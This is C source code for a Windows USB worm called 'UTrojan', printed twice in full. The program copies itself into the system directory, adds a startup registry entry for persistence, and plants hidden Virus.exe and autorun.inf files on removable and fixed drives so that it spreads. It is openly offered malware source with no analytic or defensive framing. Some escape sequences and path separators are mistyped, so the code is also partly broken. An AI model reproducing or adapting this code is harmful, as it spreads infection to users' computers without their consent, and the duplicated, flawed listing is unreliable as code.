#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
HANDLE hMutex;//信号量句柄
DWORD WINAPI infect(LPVOID lpParam);//感染
void Install(void); //安装
void InfectOtherDisk();//感染其它盘
char ExeFile[MAX_PATH];
//==========================================================================
void Install(void)
{
char FilePath[255]={0};
char Explorer[12]="explorer ";
HKEY AutoStart;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
if(GetSystemDirectory(FilePath,254) == 0)
{
return;
}
strcat(FilePath, "//Virus.exe");
CopyFile(ExeFile, FilePath, true);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run",
0, KEY_ALL_ACCESS, &AutoStart);
RegSetValueEx(AutoStart, // subkey handle
"UTrojan", // value name
0, // must be zero
REG_SZ, // value type
(LPBYTE) FilePath, // pointer to value data
strlen(FilePath) + 1); // length of value data
RegCloseKey(AutoStart);
strcpy(FilePath,ExeFile); //now use FilePath[] as temp
FilePath[3]='/0';
strcat(Explorer,FilePath);
CreateProcess( NULL, //open the directory of U-stick as usual
Explorer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi );
return;
}
//==========================================================================
DWORD WINAPI infect(LPVOID lpParam)
{
char Drives[255];
int DriveType;
char *pDrive=0;
char FilePath[25];
FILE *AutoRun;
while(true)
{
memset(Drives,0,255);
memset(FilePath,0,25);
pDrive=Drives;
DriveType=0;
AutoRun=NULL;
GetLogicalDriveStrings(254,Drives);
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType!=DRIVE_REMOVABLE)
{
pDrive+=4;
continue;
}
strcpy(FilePath,pDrive);
strcat(FilePath,"Virus.exe");
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
CopyFile(ExeFile, FilePath, false);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
strcpy(FilePath,pDrive);
strcat(FilePath,"autorun.inf");
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
AutoRun=fopen(FilePath,"w+");
if(AutoRun!=NULL)
{
fputs("[AutoRun]/n",AutoRun);
fputs("open=Virus.exe/n",AutoRun);
fputs("shellexecute=Virus.exe/n",AutoRun);
fputs("shell//Auto//command=Virus.exe",AutoRun);
}
fclose(AutoRun);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
Sleep(3000); //every 3sec to detect whether a U-stick exits
}
return 0;
}
//==========================================================================
void InfectOtherDisk(void)
{
char Drives[255];
int DriveType;
char *pDrive=0;
char AppFilePath[25];
char InfFilePath[25];
memset(Drives,0,255);
memset(AppFilePath,0,25);
memset(InfFilePath,0,25);
pDrive=Drives;
DriveType=0;
GetLogicalDriveStrings(254,Drives);
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType==DRIVE_FIXED)
{
strcpy(AppFilePath,pDrive);
strcpy(InfFilePath,pDrive);
strcat(AppFilePath,"Virus.exe");
strcat(InfFilePath,"autorun.inf");
CopyFile(ExeFile,AppFilePath, true);
SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CopyFile("autorun.inf",InfFilePath,true);
SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
else
{
break;
}
}
}
//==========================================================================
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
int DriveType;
GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径
if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL)
{
return 0;
}
DriveType=GetDriveType(NULL);
if(DriveType==DRIVE_REMOVABLE)
{
Install();
InfectOtherDisk();
ReleaseMutex(hMutex);
return 0;
}
else if (DriveType==DRIVE_FIXED)
{
InfectOtherDisk();
CreateThread(NULL,NULL,infect,NULL,NULL,NULL);
return 0;
}
else
{
return 0;
}
}
#include <stdio.h>
#include <windows.h>
HANDLE hMutex;//信号量句柄
DWORD WINAPI infect(LPVOID lpParam);//感染
void Install(void); //安装
void InfectOtherDisk();//感染其它盘
char ExeFile[MAX_PATH];
//==========================================================================
void Install(void)
{
char FilePath[255]={0};
char Explorer[12]="explorer ";
HKEY AutoStart;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
if(GetSystemDirectory(FilePath,254) == 0)
{
return;
}
strcat(FilePath, "//Virus.exe");
CopyFile(ExeFile, FilePath, true);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run",
0, KEY_ALL_ACCESS, &AutoStart);
RegSetValueEx(AutoStart, // subkey handle
"UTrojan", // value name
0, // must be zero
REG_SZ, // value type
(LPBYTE) FilePath, // pointer to value data
strlen(FilePath) + 1); // length of value data
RegCloseKey(AutoStart);
strcpy(FilePath,ExeFile); //now use FilePath[] as temp
FilePath[3]='/0';
strcat(Explorer,FilePath);
CreateProcess( NULL, //open the directory of U-stick as usual
Explorer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi );
return;
}
//==========================================================================
DWORD WINAPI infect(LPVOID lpParam)
{
char Drives[255];
int DriveType;
char *pDrive=0;
char FilePath[25];
FILE *AutoRun;
while(true)
{
memset(Drives,0,255);
memset(FilePath,0,25);
pDrive=Drives;
DriveType=0;
AutoRun=NULL;
GetLogicalDriveStrings(254,Drives);
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType!=DRIVE_REMOVABLE)
{
pDrive+=4;
continue;
}
strcpy(FilePath,pDrive);
strcat(FilePath,"Virus.exe");
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
CopyFile(ExeFile, FilePath, false);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
strcpy(FilePath,pDrive);
strcat(FilePath,"autorun.inf");
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
AutoRun=fopen(FilePath,"w+");
if(AutoRun!=NULL)
{
fputs("[AutoRun]/n",AutoRun);
fputs("open=Virus.exe/n",AutoRun);
fputs("shellexecute=Virus.exe/n",AutoRun);
fputs("shell//Auto//command=Virus.exe",AutoRun);
}
fclose(AutoRun);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
Sleep(3000); //every 3sec to detect whether a U-stick exits
}
return 0;
}
//==========================================================================
void InfectOtherDisk(void)
{
char Drives[255];
int DriveType;
char *pDrive=0;
char AppFilePath[25];
char InfFilePath[25];
memset(Drives,0,255);
memset(AppFilePath,0,25);
memset(InfFilePath,0,25);
pDrive=Drives;
DriveType=0;
GetLogicalDriveStrings(254,Drives);
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType==DRIVE_FIXED)
{
strcpy(AppFilePath,pDrive);
strcpy(InfFilePath,pDrive);
strcat(AppFilePath,"Virus.exe");
strcat(InfFilePath,"autorun.inf");
CopyFile(ExeFile,AppFilePath, true);
SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CopyFile("autorun.inf",InfFilePath,true);
SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
else
{
break;
}
}
}
//==========================================================================
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
int DriveType;
GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径
if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL)
{
return 0;
}
DriveType=GetDriveType(NULL);
if(DriveType==DRIVE_REMOVABLE)
{
Install();
InfectOtherDisk();
ReleaseMutex(hMutex);
return 0;
}
else if (DriveType==DRIVE_FIXED)
{
InfectOtherDisk();
CreateThread(NULL,NULL,infect,NULL,NULL,NULL);
return 0;
}
else
{
return 0;
}
}